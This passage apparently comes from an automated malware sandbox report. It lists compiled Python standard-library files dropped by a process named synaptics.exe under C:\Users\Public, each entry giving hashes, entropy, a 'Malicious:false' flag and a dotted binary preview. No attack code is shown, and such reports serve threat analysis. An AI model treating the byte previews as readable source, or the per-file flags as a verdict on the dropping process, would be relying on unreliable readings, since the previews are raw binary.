                                                                                                                                                                                                                                  Preview:o........'-d.g.......................@...sT...d.Z.d.Z.d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z...e...d.e.j...Z.e...d.e.j...Z.d.d.l.Z.e.j.g.d.....Z.[.G.d.d...d.e...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.e.e.d.e.......e.e.....Z.d.Z d.Z!d.Z"d.Z#d.Z$e.e!e"e#e$..Z%d.Z&e.d.d ..e.e&....Z'd!e&..Z(e.e'e(..Z)e.d"e)d#....Z*e.e*e)e%..Z+d$d%..Z,e.j-d&d'....Z.e.e,....Z/d(Z0d)Z1d*Z2d+Z3e.e/d,..e/d-....Z4e.e/d...e/d/....Z5e.e6e.j7e8e.d0d1......Z9e.d2e9..Z:e.e+e:e5e ..Z;e.e;..Z<e.e/d3..e.d4d.....e/d5..e.d6d.......Z=e.d7e.e4..Z>e.e.e>e+e:e=e ....Z?i.Z@e,..D.].ZAe0e@eAd4..<.e1e@eAd6..<.e2e@eAd,..<.e3e@eAd-..<...q.eB..ZCeB..ZDe,..D.]%ZEeEd6..eEd4..f.D.].ZFeC.GeF......qIeEd-..eEd,..f.D.].ZFeD.GeF......qZ..q?d8ZHG.d9d:..d:eI..ZJG.d;d<..d<eI..ZKG.d=d>..d>..ZLd?d@..ZMdAdB..ZNdCdD..ZOdEdF..Z.dGdH..ZPdIdJ..ZQdKdL..ZRdMdN..ZSeTdOk...r.eS....d.S.d.S.)Pao...Tokenization help for Python programs...tokenize(readline) is a generator that breaks a stream
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21719
                                                                                                                                                                                                                                  Entropy (8bit):5.297238062824675
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:IooBGsSgHvgJJpLbiO+pSbnwRG+SbL3JWFsFmpbQigBsGUa2l4cCKJJBq:IoowcHvIJpiJAngz4BNUpl4cCkJBq
                                                                                                                                                                                                                                  MD5:5B0B531AA200F7102F48A6303B5F42E6
                                                                                                                                                                                                                                  SHA1:0B7763AD5813D31FD59D7C7875F38FDC5C355E53
                                                                                                                                                                                                                                  SHA-256:890B7EF78DA3DC352B106CC722460E8F8AAC65987B940B4FF7ECCD910F8AB568
                                                                                                                                                                                                                                  SHA-512:C56CBE5243A8506906FF2DC7428474DCD021E970EF13893770DEDD8EC7D7887835D8B7010AD9DEBDA7CE2C8D06CC9836A7420A5AAF5F1168F99F2AEB60BC1FA1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.i.......................@...sJ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d8d.d...Z.d.d...Z.d9d.d...Z.d8d.d...Z.d8d.d...Z.d.Z.d.Z.G.d.d...d...Z.e...Z.d.d...Z.e.e.d.d.d.f.d.d...Z.e.e.d.d.f.d.d...Z.e.f.d.d...Z.d.d...Z.d.d...Z.d:d.d ..Z.d;d!d"..Z.d:d#d$..Z.d<d%d&..Z.d9d'd(..Z.d9d)d*..Z.d+d,..Z.G.d-d...d...Z.d/d0..Z.d1d2..Z.d3Z.G.d4d5..d5e ..Z!G.d6d7..d7..Z"d.S.)=z@Extract, format and print information about Python stack traces......N)...extract_stack..extract_tb..format_exception..format_exception_only..format_list..format_stack..format_tb..print_exc..format_exc..print_exception..print_last..print_stack..print_tb..clear_frames..FrameSummary..StackSummary..TracebackException..walk_stack..walk_tbc....................C...s4...|.d.u.r.t.j.}.t...|.......D.].}.t.|.|.d.d.....q.d.S.).zyPrint the list of tuples as returned by extract_tb() or. extract_stack() as a formatted stack trace to the given file.N......file..end)...sys..stderrr......from_list..format..print)...extracted_l
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9536
                                                                                                                                                                                                                                  Entropy (8bit):5.147543475999727
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:W8BGSXkI30NX7ad5RV7VIPNmXkXFNlO8U2UuLWnxq3juXvypQ1SwDFBL0GSSSOSD:jBGgfmoV4NmAFyvWLwx8pOXU/l4r/sV
                                                                                                                                                                                                                                  MD5:F046967E9C61F248D0B1060BEC61086D
                                                                                                                                                                                                                                  SHA1:5E87E274DD26A4B58F2D3E7BAC72C1F56A675697
                                                                                                                                                                                                                                  SHA-256:DDB5443FBC7C0405816E03A2F340A621A1FC3683C8B57BA3C77B47AC6B630AF8
                                                                                                                                                                                                                                  SHA-512:39B38615CBCE1854240B1994A250DA5659B00EFDA92802D35196B836AAE7DDE3D040F35545DF919C6B015AFD863EEECE08825A36CCF07AA88205CC8AC4B37A67
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.(.......................@...s....d.Z.d.d.l.Z.d.d...Z.e.e...Z.e.d.d.....Z.e.e.j...Z.e.e.j...Z.e.e.j...Z.d.d...Z.e.e.....Z.d.d...Z.e.e.....Z.d.d...Z.e...Z.e.e...Z.e.......d.d...Z.e...Z.e.e...Z.G.d.d...d...Z.e.e...j...Z.e.e...Z.e.g.j...Z.e.e.j...Z.e.e...j...Z e.e!j"..Z#e.e$j.d.....Z%e.e...Z&z.e'....e'y.......e..(..d...Z)e.e)..Z*e.e)j+..Z,d.Z)[)Y.n.w.e.e.j...Z-e.e.j...Z/[.[.[.[.[.[.d$d.d...Z0d.d...Z1d%d.d...Z2d.d...Z3G.d.d...d...Z4G.d.d...d...Z5d d!..Z6e.e7e8....Z9e.e8e!B...Z:e.e;..Z<e.d...Z=e.e>..Z?d"d#..e@..D...ZAd.S.)&zO.Define names for built-in types that aren't directly accessible as a builtin.......Nc....................C........d.S...N..r....r....r.....'C:\Users\Public\M20EKMMEH2\lib\types.py.._f...........r....c....................C...r....r....r....r....r....r....r......<lambda>....r....r....c........................s....d.....f.d.d...}.|.j.d...S.).N.....c........................r....r....r....r........ar....r......f....r....z._cell_factory.<locals>.fr....)...__closu
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):85288
                                                                                                                                                                                                                                  Entropy (8bit):5.276300689614903
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:XCXtWnoBkc6T6G9vSgukYqUwmM6eOZltKNtB21bvSF3hCOp9NxT51mWbAyfthIR3:SyV2k3k2Ntg1UQOpNb18oc3
                                                                                                                                                                                                                                  MD5:C050ED2070D4096E3C34DC2DED00EDBC
                                                                                                                                                                                                                                  SHA1:63601254012B307CB34D8C95E384D8874DE448F4
                                                                                                                                                                                                                                  SHA-256:3CF0C404A697DDE4C6E39FF4BF78806B2A9F80109D2ED7F904497ACDC6755441
                                                                                                                                                                                                                                  SHA-512:50EEA22603F01711DE797DE4EEA043A6EE76C42B0D2D2AFCA1CB69D6D8119536D7ADCF36817EBF8F792F473F96B6B90D18BBAA04BB72586BD9B0374036F7C56D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.t.......................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...g.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.g.Z.d.d.d...d.d...Z.e...f.d d!..Z.G.d"d#..d#..Z G.d$d%..d%..Z!G.d&d'..d'e d.d(..Z"G.d)d*..d*e"d.d(..Z#e"d+d,....Z$e"d-d.....Z%e"d/d0....Z&e"d1d2....Z'e"d3d4....Z(e"d5d6....Z)e#e.d.d...d7d8......Z*e"d9d:....Z+e"d;d<....Z,e"d=d>....Z-G.d?d@..d@e d.d(..Z.G.dAdB..dB..Z/G.dCdD..dDe e!e/d.d(..Z0G.dEdF..dFe e!d.d(..Z1G.dGdH..dHe e!d.d(..Z2G.dIdJ..dJe e!e/d.d(..Z3dKdL..Z4G.dMdN..dNe d.d(..Z5G.dOdP..dPe5d.d(..Z6G.dQdR..dRe5d.d(..Z7G.dSdT..dTe6d.d(..Z8G.dUdV..dVe7d.d(..Z9G.dWdX..dXe7d.d(..Z:G.dYdZ..dZe6d.d(..Z;d[d\..Z<G.d]d^..d^e6d.d(..Z=G.d_d`..d`e6d.d(..Z>G.dadb..db..Z?G.dcdd..dd..Z@G.dedf..df..ZAg.dg..ZBg.dh..ZCeBeC..dig...ZDdjdk..ZEdldm..ZFdndo..ZGd.drds..ZHd.dudv..ZIg.dw..dxdyg.dz..ZJG.d{d|..d|e...ZKG.d}d~..d~e?eKd...ZLG.d.d...d.e6d.d(
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3699
                                                                                                                                                                                                                                  Entropy (8bit):5.561938505627536
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:G6AByWyhU9ShozDLcLmxESqc0Ic5k4CW36/:G6AByWS2zECW3u4c/
                                                                                                                                                                                                                                  MD5:174A118F6C645E98949C462CB7EBDA94
                                                                                                                                                                                                                                  SHA1:AD49DEB3B3129D667ACD54B3BAB7E3477AE50088
                                                                                                                                                                                                                                  SHA-256:93140E48DE01C46E14E4F59DF8005DDBD35F8B30A2F7427243E7B82FF50167BC
                                                                                                                                                                                                                                  SHA-512:1A1CFBCC794597F596F64C878F164534EBB8D8C74745F5BD0079F01F8E75FAE7199BB9221E591115872EC8C22B3D71C5A5B44FAFF72E5BECDD510264827B982B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sl...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.G.d.d...d.e...Z.d.d.d...d.d...Z.d.d.d...Z.d.d...Z.e.d.k.r4e.....d.S.d.S.).z.Implementation of the UUencode and UUdecode functions...encode(in_file, out_file [,name, mode], *, backtick=False).decode(in_file [, out_file, mode, quiet])......N)...Error..encode..decodec....................@...s....e.Z.d.Z.d.S.).r....N)...__name__..__module__..__qualname__..r....r.....$C:\Users\Public\M20EKMMEH2\lib\uu.pyr....'...s........r....F....backtickc....................C...sx...g.}.z.|.d.k.r.t.j.j.}.n/t.|.t...r;|.d.u.r.t.j...|...}.|.d.u.r1z.t...|...j.}.W.n...t.y0......Y.n.w.t.|.d...}.|...|.....|.d.k.rDt.j.j.}.n.t.|.t...rSt.|.d...}.|...|.....|.d.u.rYd.}.|.d.u.r_d.}.|...d.d...}.|...d.d...}.|...d.|.d.@.|.f.....d.......|...d...}.t.|...d.k.r.|...t.j.|.|.d.......|...d...}.t.|...d.k.s.|.r.|...d.....n.|...d.....W.|.D.].}.|.......q.d.S.|.D.].}.|.......q.w.).z.Uuencode file..-N..rb..wbi.......z.\n...z.\rz.begin %o %s.i......ascii
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13657
                                                                                                                                                                                                                                  Entropy (8bit):5.37708311819733
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:QBo+b+Hagj6xo0+q6pRkgm0PN5hltuyFBdMTtwKVv6lx2u4X:QVqHagj6xLD6t/cyFBdMTtJilx2u4X
                                                                                                                                                                                                                                  MD5:E5A661D3003F1F328DB1AF771CFD5D2A
                                                                                                                                                                                                                                  SHA1:2AF4708B24AB4DEA8905C5AB1E7CFE62CBF9F6E0
                                                                                                                                                                                                                                  SHA-256:64FDE3CA6D70AADF8E9E488D4CF90D4A2B73823B54292AA4B4D343E7D25D52D7
                                                                                                                                                                                                                                  SHA-512:D57A6841360386B1D95103F5176139D05066579389BB8E1B058D3F00CEBA7693DF3C50B7C7CF8D460CD5F288455FC0AFB6FD24B18416F89A193FE00866AF827B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d=d.d...Z.d>d.d...Z.d.d...Z.d.d...Z.e.Z.d.d...Z.e.Z.d.d...Z.d.e.d.d.d.f.d.d...Z.e.d.d.f.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d?d)d*..Z.....d@d+d,..Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.d1d2..Z.z.d.d3l.m.Z.m Z m!Z!m.Z.m.Z.m"Z"..e Z#e!Z$d4Z%W.n...e&y.......g.Z.d5Z#i.Z$d(a'd6d7..Z"d.Z%Y.n.w.e.e.j(....e%s.e)e.d8..s.e.d5e*d9d(d:....e.d;e*d(d<....e.d;e+d(d<....e.d;e,d(d<....e.d;e-d(d<....[%d.S.)Az&Python part of the warnings subsystem......N)...warn..warn_explicit..showwarning..formatwarning..filterwarnings..simplefilter..resetwarnings..catch_warningsc....................C...s....t.|.|.|.|.|.|...}.t.|.....d.S.)..7Hook to write a warning to a file; replace if you like.N)...WarningMessage.._showwarnmsg_impl)...message..category..filename..lineno..file..line..msg..r.....*C:\Users\Public\M20EKMMEH2\lib\warnings.pyr........s........r....c....................C...s....t.|.|.|.|.d.|...}.t
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20354
                                                                                                                                                                                                                                  Entropy (8bit):5.081065523914
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:QjNLEfZTpG14+ORhWBdAP/+6BWCyljPj8j/sBMpNLRVcNh4oC+erfAh:QpeZE15QhWBdg/+6zyhOpNHS/CXLAh
                                                                                                                                                                                                                                  MD5:A2D75321057A236D4499B27D53386495
                                                                                                                                                                                                                                  SHA1:731DF7D18724AF9FA2F88CB8E9BC050FB7524C2A
                                                                                                                                                                                                                                  SHA-256:ED18B5DA42316A9ED98984AC6CE9BC1CD4D076BF0D2512DE711CC12FDF2CC158
                                                                                                                                                                                                                                  SHA-512:48E2072AF2F9AA6F95A59BE344F544BBD3014CC0C8DE217AAE3ED345796736E9CEC0E8791288DD80227566486FAD422B21CDC7458E277448894BC50BE3876F98
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.V.......................@...s....d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.e.f.Z.g.d...Z.e.j...e.....e.j...e.....G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d...Z.d.S.).z|Weak reference support for Python...This module is an implementation of PEP 205:..https://www.python.org/dev/peps/pep-0205/......)...getweakrefcount..getweakrefs..ref..proxy..CallableProxyType..ProxyType..ReferenceType.._remove_dead_weakref)...WeakSet.._IterationGuardN).r....r....r....r......WeakKeyDictionaryr....r....r......ProxyTypes..WeakValueDictionaryr......WeakMethod..finalizec........................sD...e.Z.d.Z.d.Z.d.Z.d.d.d...Z...f.d.d...Z.d.d...Z.d.d...Z.e.j.Z.....Z.S.).r....z.. A custom `weakref.ref` subclass which simulates a weak reference to. a bound method, working around the lifetime problem of bound methods.. )..._func_ref.._meth_type.._alive..__weakref__Nc........................sx...z.|.j.}.|.j.}.W.n...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):61046
                                                                                                                                                                                                                                  Entropy (8bit):5.525953438337611
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:cLXnJeiJWt0B6fx7SYJs5pj8bK5cYTMx/0Btq5Z:yXRWt0kfmTMSBc
                                                                                                                                                                                                                                  MD5:817A9436030D814E8D4244ACA79F6A42
                                                                                                                                                                                                                                  SHA1:A368569ED28D3D1314E54F93EFEE8BBD743B91F8
                                                                                                                                                                                                                                  SHA-256:E60567CE289E2CA7F0BEC220908994241CF146C5138BF333F085622AF339C560
                                                                                                                                                                                                                                  SHA-512:083AE93B90D3C7579CB1E254412D799ABB1F466FD80C3FF0AEF328CDFAE537454C7673CAB0EA6104C1AF0B136BB49367ACC5C11E223688D8FCCDF84C1287EC2A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.g.......................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.e.j.Z.W.n...e.yQ......d.Z.e.j.Z.Y.n.w.z.d.d.l.Z.W.n...e.yc......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.yu......d.Z.Y.n.w.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e...Z.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d.Z&d.Z'd.Z(e..)e'..Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6e..)e5..Z7d.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd.ZEd.ZFd ZGd!ZHd"ZId#ZJd$ZKd%ZLe..)eK..ZMd.ZNd.ZOd.ZPd.ZQd.ZRd.ZSd.ZTd.ZUd.ZVd.ZWd.ZXd.ZYd&ZZd'Z[e..)eZ..Z\d(Z]d)Z^e..)e]..Z_d.Z`d.Zad.Zbd.Zcd.Zdd.Zed.Zfd.Zgd.Zhd.Zid*Zje..kd+..Zld,d-..Zmd.d/..Znd0d1..Zod2d3..Zpd4d5..ZqG.d6d7..d7er..Zsd.atd8d9..Zud:d;..ZvG.d<d=..d=..ZwG.d>d?..d?..Zxi.d.d@..d.dA..d.dB..d.dB..d.dB..d.dB..d.dC..d.dD..d.dE..d.dF..d.dC..d.dG..d.dH..d#dI..dJdK..dLdM..dNdO..ZydPdQ..ZzdsdRdS..Z{dTdU..Z|G.dVdW..dW..Z}G.dXdY..dY..Z~G.dZd[..d[e.j...Z.G.d\d]..d]e.j...Z.G.d^d_..d_..Z.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):48464
                                                                                                                                                                                                                                  Entropy (8bit):5.115522838538758
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:1bQU3rQFVpyVRbeFRDRBPou+eQyWIrcabGm/9WQxSNGU4QPFHyaqNuTrjfJQRJrG:RQSAVpyWFRDRBPoJIrcabGm/9WQEN6QF
                                                                                                                                                                                                                                  MD5:44A1ACB0D0FC90FF48CD6A49CFD7881F
                                                                                                                                                                                                                                  SHA1:B153F46CDFBA27F52F99BA882C7A3B0E1CD0A5F5
                                                                                                                                                                                                                                  SHA-256:BE3A304B87614FDE3482F68837ACD10B92E1A6767C42E6DEE993D9328FA4A5EA
                                                                                                                                                                                                                                  SHA-512:760DE30F18AC7F067CB42800EE78737F6ED84DA8300C274B46CA9E17043B424D6CA3A8C7BB1DA4F4F06220C60FDAFDDC5A734FAC87470958BF31401DCDBD0405
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.yO......Y.n.w.e.j...e.....z.d.d.l.m.Z...W.n...e.yg......Y.n.w.G.d.d...d.e.j ..Z!G.d.d...d.e.j"..Z#G.d.d...d.e.j$..Z%G.d.d...d.e&..Z'G.d.d...d.e(..Z)z.d.d.l.m)Z)..W.n...e.y.......Y.n.w.z.d.d.l.m*Z*..W.n...e.y.......d.d...Z*Y.n.w.d.d.d.d...d.d...Z+d d!..Z,z.d.d"l.m,Z,..W.n...e.y.......Y.n.w.G.d#d$..d$e(..Z-G.d%d&..d&e.j...Z/G.d'd(..d(e.j...Z0G.d)d*..d*e.j...Z1G.d+d,..d,e.j2..Z3d.S.)-a?...This module implements specialized container datatypes providing.alternatives to Python's general purpose built-in containers, dict,.list, set, and tuple...* namedtuple factory function for creating tuple subclasses with named fields.* deque list-like container with fast appends and pops on either end.* ChainMap dict-like class for creating a single view of multiple mappings.* Counter dict subclass
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):249
                                                                                                                                                                                                                                  Entropy (8bit):4.8211040436413155
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:y/jcteC5VvkFZlaE+MdF/Hj5J+uIaHKHtGdgIun:CoeC7gj+Er+xNGdcn
                                                                                                                                                                                                                                  MD5:E436EE7DD594CCDA595797A6BF7E91B3
                                                                                                                                                                                                                                  SHA1:05649B2144754BB61608048C1F9A7E6F6721FAF8
                                                                                                                                                                                                                                  SHA-256:013C7466A125D69B176C935160404AF8F103B4721A81694D8E27EF190EF6EF17
                                                                                                                                                                                                                                  SHA-512:217FF6C36E6A8D95590134ACACC8C575F1BE0C01DBA2A2326E28497E1F43E6FFD5820716A0366675E01824E72C07D6EE1AAB886C5B69F20A466055DC8AA9801E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dz........................@...s$...d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.)......)...*)...__all__)..._CallableGeneriuserasN)..._collections_abcr....r......r....r.....1C:\Users\Public\M20EKMMEH2\lib\collections\abc.py..<module>....s..........
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1571
                                                                                                                                                                                                                                  Entropy (8bit):4.908307476598281
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:wwQTrff0h6aHqCZ9EwkaLt/bsTkiC50zukUzzt/bih5Nz54t/biuyzOQqt/bijsN:wwQTrfch6OD9tLNooIzrmNs4NMqNP
                                                                                                                                                                                                                                  MD5:A6340CD89DB635743F6AFFE4A5C95A54
                                                                                                                                                                                                                                  SHA1:0A8EA024FE66DF245CFAF6D3C455CEEA8C03176A
                                                                                                                                                                                                                                  SHA-256:30085C0763DB3CEDB9735DDC78D0810B7D6D1F383FF28C9087353766C3215ED9
                                                                                                                                                                                                                                  SHA-512:4DF57F75F68F20E6D60DF3BFF1A3BE77344C30B1A71AAE22126ADB817F0E93E01EC6613F7F20330499DCC2920032F05F5D0C7D57354E1ED763C53E3F2DCD2653
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d$........................@...s0...d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z?A package for parsing, handling, and generating email messages.).Z.base64mime..charsetZ.encoders..errorsZ.feedparser..generator..headerZ.iterators..message..message_from_file..message_from_binary_file..message_from_string..message_from_bytesZ.mime..parserZ.quoprimime..utilsc....................O.... ...d.d.l.m.}...|.|.i.|.......|...S.).zvParse a string into a Message object model... Optional _class and strict are passed to the Parser constructor.. .........Parser)...email.parserr....Z.parsestr)...s..args..kwsr......r.....0C:\Users\Public\M20EKMMEH2\lib\email\__init__.pyr.... ............r....c....................O...r....).z|Parse a bytes string into a Message object model... Optional _class and strict are passed to the Parser constructor.. r........BytesParser).r....r....Z.parsebytes).r....r....r....r....r....r....r....r....(...r....r....c....................O...r....).z.Read
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5751
                                                                                                                                                                                                                                  Entropy (8bit):5.419136465891573
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:gOU9w0nDhN4XpaTzT797ta3T8qCpjjRtfklxvvp/qLfrg8NNOGbM//qH1uqs:yNN0UHy8h7fOvh/WgGN6XqHkqs
                                                                                                                                                                                                                                  MD5:A8A3A06A3C94E0C6A288E2494422319A
                                                                                                                                                                                                                                  SHA1:8964A55AE4F75350DF0A1662368DF04439A9D58B
                                                                                                                                                                                                                                  SHA-256:C1F98F6D311DD77600FB9FE660BEC9CF5BE2BE0EB4F36B17F808049D958AFBF2
                                                                                                                                                                                                                                  SHA-512:45E5C31A3437923760A3A3F0A3217B87BB77E8A619D457E640E1B15E18E6E9F3E1180A701445F3860B2912CA1E9797FE3ED58302071AC8C57DD164D59A31C62E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dF".......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.e...e...d...j.d.d.....Z.d.d...Z.G.d.d...d.e...Z.e...Z.d.e.e.d...<.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.e.d...Z.d.d...Z.e.e.d...Z.e.e.d...Z.d d.d...Z.d.S.)!z. Routines for manipulating RFC2047 encoded words...This is currently a package-private API, but will be considered for promotion.to a public API if there is demand........N)...ascii_letters..digits)...errors)...decode_q..encode_q..decode_b..encode_b..len_q..len_b..decode..encodes....=([a-fA-F0-9]{2})c....................C...s....t...|...d.........S.).N.....)...bytes..fromhex..groupr....)...m..r.....6C:\Users\Public\M20EKMMEH2\lib\email\_encoded_words.py..<lambda>A...s......r....c....................C...s....|...d.d...}.t.|...g.f.S.).N....._..... )...replace.._q_byte_subber)...encodedr....r....r....r....C...s........r....c....................@...s,...e.Z.d.Z.d.e...d.....e...d.....Z.d.d...Z.d.S.)..._QByteMaps....
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12523
                                                                                                                                                                                                                                  Entropy (8bit):5.367166437455321
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:48lfo3BPanIUGehSKaPvqloJzp9UokTFptf58GxRWc:XlgxMGeMPFp9HkT4G3F
                                                                                                                                                                                                                                  MD5:12B8AE295D55DAAC9D200B5AF1146275
                                                                                                                                                                                                                                  SHA1:4BD00A9691802C8A42143A144A4CA2FE628046FE
                                                                                                                                                                                                                                  SHA-256:A64AA33CA4BB0BAF6BEDDEEB9C95530C72934BDB5A5864AF2FC79B27802348D2
                                                                                                                                                                                                                                  SHA-512:9853EEB9219C15A690A4903A0EDCA5E4E9E94599508BAEDCBF4EF6E29D76FDCAAF18BA924AEC482114A71223EFE7F4E197AF2F5965DEB9695E2D71B846B4FAC3
                                                                                                                                                                                                                                  Malicious:false
